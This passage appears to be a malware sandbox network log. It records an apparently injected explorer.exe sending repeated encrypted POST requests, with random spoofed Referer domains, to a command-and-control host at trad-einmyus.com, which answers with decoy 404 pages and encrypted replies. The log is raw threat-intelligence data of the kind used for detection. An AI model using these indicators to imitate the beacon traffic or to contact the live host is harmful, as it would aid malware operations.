                                                                                                                                                                                                                                      Mar 28, 2024 17:51:15.885901928 CET1286INData Raw: aa 80 8d 02 9d 2c 10 4e 0c 1e a8 32 ee 00 ab ef a3 d4 20 aa 57 6a d5 b5 0d 00 86 92 bf ee 8c c5 a8 82 eb ad b7 a7 3f 56 33 be a4 9d 83 00 79 7b 3a 86 3a 89 3d 55 bd a7 a4 86 11 90 5f ea e8 3d 34 86 aa 00 d4 b7 c6 e6 25 4a d5 88 79 55 7f a2 2e 79
                                                                                                                                                                                                                                      Data Ascii: ,N2 Wj?V3y{::=U_=4%JyU.yN7rBa=aTiA7T0yU8mHy*o~TdziPVG 9a5/N`CcbGYhL[c3L=Y8G[5ol#Z
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:15.885916948 CET1286INData Raw: 63 04 6a 98 d0 92 27 9e a1 2d 83 7b 3b aa 93 7d 75 6e 53 ec e0 ff ff ff ff 6d 88 eb c8 e5 ff ff ff ff 18 a9 5f 59 6e 05 59 de dd 72 1b 0f 5a e0 28 65 12 eb ad b0 73 af e4 34 57 1f 23 25 9f ce 3a 59 08 0a aa bc ff 27 7d 8f ce 7d ca ff ff ff ff 39
                                                                                                                                                                                                                                      Data Ascii: cj'-{;}unSm_YnYrZ(es4W#%:Y'}}9B%"%no-/MeNKWR9Yir;AHYIr$N~AthZ5K?:RU~s3Y[RYrl\>YmdYrYhg uiX%/7e#
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:15.885972977 CET1286INData Raw: 8b 8c 4a ee 2d f5 bf 0f 82 13 87 36 00 d6 7d fc b6 e4 0d ed 47 87 cd e9 6d 03 50 c1 d3 f1 80 10 92 62 a0 94 28 76 bd 3c 56 04 7d fd bf 4f 1d ac de a9 e6 e0 ff ff ff ff 99 42 68 ba df ff ff ff ff 55 1f 8b a3 77 7e a3 66 8e 71 e5 64 71 f6 20 f2 9c
                                                                                                                                                                                                                                      Data Ascii: J-6}GmPb(v<V}OBhUw~fqdq `-3.WTaRko4B8H0*40T2&<F-TN&,EDiuOk%.!iu_!{k$HCA"d%Dk0R^6LI.0d
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:16.214643955 CET1286INData Raw: 80 d6 fd 88 f4 2e 8a c4 cf b2 ce a4 60 ae a5 e0 7c 76 72 34 3f a2 9e 6c c8 16 3d 20 1c 7e ba 44 05 84 14 f6 06 f4 c0 dc c2 39 b8 aa 88 71 f1 53 a3 a1 95 71 1f 0c 9d af cd 74 f4 06 f6 7c 58 9c f2 11 5a 61 1e 35 e5 ff ff ff ff 19 3c eb a6 14 ab 31
                                                                                                                                                                                                                                      Data Ascii: .`|vr4?l= ~D9qSqt|XZa5<1=!31qS1Z7{PuikoRSD$87|h"&5w^D.nb0o]"**6/@IjQ ^fq1o5i_]v


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      7192.168.2.64972081.94.159.197804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:20.676863909 CET284OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://bdsqoggpfrmafq.com/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 146
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:20.676886082 CET146OUTData Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 84 de 84 66 5d 02 c9 a1 c1 64 19 ac b0 67
                                                                                                                                                                                                                                      Data Ascii: k9w4yBD1^h}k\Fu$f]dgcC]o,k2D`'{#4?IRXCQN#~V>w
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:20.915759087 CET578INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:51:20 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      transfer-encoding: chunked
                                                                                                                                                                                                                                      Data Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:20.934111118 CET284OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://pdvtvvujfpykxl.net/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 287
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:20.934142113 CET287OUTData Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 85 66 5d 02 c8 a1 c1 64 11 86 c5 1b
                                                                                                                                                                                                                                      Data Ascii: k9w4yBD1^h}k\Fu$f]dZ1i<zg@E\3jzPhHS+9IV_;jijY%R4,~#B&#m6nR&aB/NyqDDm+\bzA4]&{cxgA%R2
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:21.169384956 CET137INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:51:21 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      content-length: 0
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:21.183137894 CET281OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://flxeggavyom.net/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 239
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:21.183172941 CET239OUTData Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 82 66 5d 02 c8 a1 c1 64 20 ac 86 6e
                                                                                                                                                                                                                                      Data Ascii: k9w4yBD1^h}k\Fu$f]d n$osyj{6jHfbGc\jh8:?VnC(GA;E2oKF0yT#OI@eOKbp%&@+r]_{{I3T['~4
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:21.419150114 CET137INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:51:21 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      content-length: 0
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:21.423551083 CET284OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://rdeutjvmtpeybn.com/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 341
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:21.423577070 CET341OUTData Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 83 66 5d 02 c8 a1 c1 64 00 bb b8 13
                                                                                                                                                                                                                                      Data Ascii: k9w4yBD1^h}k\Fu$f]d?G@%k_LGeeobUionZ2C.g6rdhGoA+5|N$ 1C<#:yU ]WNAy_F~/<N'tQf[ud"YN
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:21.661884069 CET243INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:51:21 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      transfer-encoding: chunked
                                                                                                                                                                                                                                      Data Raw: 34 46 0d 0a 04 00 ed 98 a4 08 a8 37 33 7c 09 c7 22 84 f6 82 af 73 32 f3 a2 68 33 54 27 c3 83 be 8e 99 1e a2 08 c9 63 a5 53 63 97 09 f8 ea 22 e5 38 69 15 b9 e0 9e 0f a2 17 c9 02 94 a7 7a d4 60 a6 bc 8d 14 3b 84 c3 3f 44 88 dd ca 0a 86 89 a2 0c bd 74 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 4F73|"s2h3T'cSc"8iz`;?Dt0
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:21.696634054 CET285OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://svcrlgovfyqyxld.org/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 157
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:21.696661949 CET157OUTData Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 84 de 83 66 5d 02 c9 a1 c1 64 06 86 df 6f
                                                                                                                                                                                                                                      Data Ascii: k9w4yBD1^h}k\Fu$f]do):D8myCK""R:)$A!0e}[yUIT9"0Oc9
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:21.932765007 CET578INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:51:21 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      transfer-encoding: chunked
                                                                                                                                                                                                                                      Data Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:21.976727009 CET286OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://mbkechetmnnrcdik.net/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 223
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:21.976752043 CET223OUTData Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 80 66 5d 02 c8 a1 c1 64 5c b3 9f 73
                                                                                                                                                                                                                                      Data Ascii: k9w4yBD1^h}k\Fu$f]d\s06oUd<W=<-z tl\X[/paHmatfCkwAv[ZJ=?a'MWknHNC"eU_=#
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:22.237431049 CET137INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:51:22 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      content-length: 0
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:22.239764929 CET281OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://nldnpyxotgr.org/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 327
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:22.239794016 CET327OUTData Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 81 66 5d 02 c8 a1 c1 64 0f 99 a1 71
                                                                                                                                                                                                                                      Data Ascii: k9w4yBD1^h}k\Fu$f]dq*hw]XI((5]bxz,j`whB?9^Q]T#=QXY$+@ \b[iYj:8,z=Dif6NZZqE%v<{|`6!6)l_\[
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:22.476824999 CET578INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:51:22 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      transfer-encoding: chunked
                                                                                                                                                                                                                                      Data Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:22.479108095 CET281OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://maghsaqdhdw.org/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 241
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:22.479140043 CET241OUTData Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de be 66 5d 02 c8 a1 c1 64 40 95 bc 2d
                                                                                                                                                                                                                                      Data Ascii: k9w4yBD1^h}k\Fu$f]d@-[7gU>4"-HC_`)<_QA]tT_$p;HW!%TD,N%yxRDk'9v-S'PP<G-}_5`DKo6w2Oou?
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:22.716532946 CET137INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:51:22 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      content-length: 0
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:22.718653917 CET282OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://vougeeiwtdhw.com/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 237
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:22.718688011 CET237OUTData Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de bf 66 5d 02 c8 a1 c1 64 50 cd 86 67
                                                                                                                                                                                                                                      Data Ascii: k9w4yBD1^h}k\Fu$f]dPgEO5l)hw8TYnGZjaB-;-+ZY^&bi#7JL)@wZwg@I m@ECAkUp'WR`TCPbh(p]Z
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:22.955265999 CET137INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:51:22 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      content-length: 0
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:22.958626032 CET283OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://freqadqrkclin.net/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 190
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:22.959245920 CET190OUTData Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de bc 66 5d 02 c8 a1 c1 64 1e d7 ac 21
                                                                                                                                                                                                                                      Data Ascii: k9w4yBD1^h}k\Fu$f]d!]Y3DvgtSa)vrZ;Ac5b2H/>?|8.(_D6N.<# Q]]{'F!J_d]
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:23.196273088 CET214INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:51:23 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      transfer-encoding: chunked
                                                                                                                                                                                                                                      Data Raw: 33 32 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 89 43 14 78 1d e4 a3 8f ba a8 15 ea 1f d1 6f f8 62 7a b9 35 e3 e8 2d e9 3f 46 50 b9 e1 d9 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 32I:82OCxobz5-?FP0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      8192.168.2.64972581.94.159.197804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:24.068152905 CET281OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Referer: http://uxxyleynxaf.net/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Content-Length: 110
                                                                                                                                                                                                                                      Host: trad-einmyus.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:24.068203926 CET110OUTData Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de bd 66 5d 02 c8 a1 c1 64 5b d2 9a 33
                                                                                                                                                                                                                                      Data Ascii: k9w4yBD1^h}k\Fu$f]d[3#4]_V[S71}qgU
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:24.304903030 CET578INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      server: nginx/1.20.2
                                                                                                                                                                                                                                      date: Thu, 28 Mar 2024 16:51:24 GMT
                                                                                                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                      transfer-encoding: chunked
